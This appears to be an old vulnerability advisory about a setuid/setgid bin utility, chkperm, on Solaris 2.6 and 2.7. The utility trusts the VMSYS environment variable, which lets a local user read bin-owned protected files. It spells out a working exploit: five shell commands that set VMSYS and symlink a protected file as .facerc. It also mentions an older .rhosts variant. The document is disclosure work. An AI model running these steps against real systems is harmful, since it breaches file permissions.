Solaris 2.x
Brock Tellier found following. /usr/vmsys/bin/chkperm can be
used to read bin-owned files. All testing was done on Solaris 2.7
and 2.6 SPARC edition. This one isn't nearly as interesting as
the instant-shell variety. Here's how it works. chkperm is
suid/sgid bin as shown:
bash-2.02$ ls -la /usr/vmsys/bin/chkperm
-rwsr-sr-x 1 bin bin 10080 Sep 1 1998 /usr/vmsys/bin/chkperm
/etc/bin is a bin/bin owned file mode 660 (thus shouldn't be
readable by those not being bin) as shown:
bash-2.02$ ls -la /etc/bin
-rw-rw---- 1 bin bin 45 Nov 15 16:44 /etc/bin
The exploit goes as follows:
bash-2.02$ export VMSYS=/usr/home/$USER
bash-2.02$ mkdir lib
bash-2.02$ chmod 777 lib
bash-2.02$ ln -s /etc/bin lib/.facerc
bash-2.02$ /usr/vmsys/bin/chkperm -l
As we can see, it cuts off the last line of five total for some
reason. The meat of this exploit is the fact that chkperm allows
you to supply the directory it will write known file names with
VMSYS, a big no-no. Brock hasn't been able to get chkperm to
either a) change the permissions of an existing bin-owned file or
b) create a bin-owned file other than .facerc, though this can be
created anywhere on the filesystem via export VMSYS=/etc or some
such command.
This exploit is sort-of a variation on the old chkperm exploit
which allowed .facerc to be linked to /usr/bin/.rhosts. That
particular problem was fixed, but this one was left behind.
Nothing yet.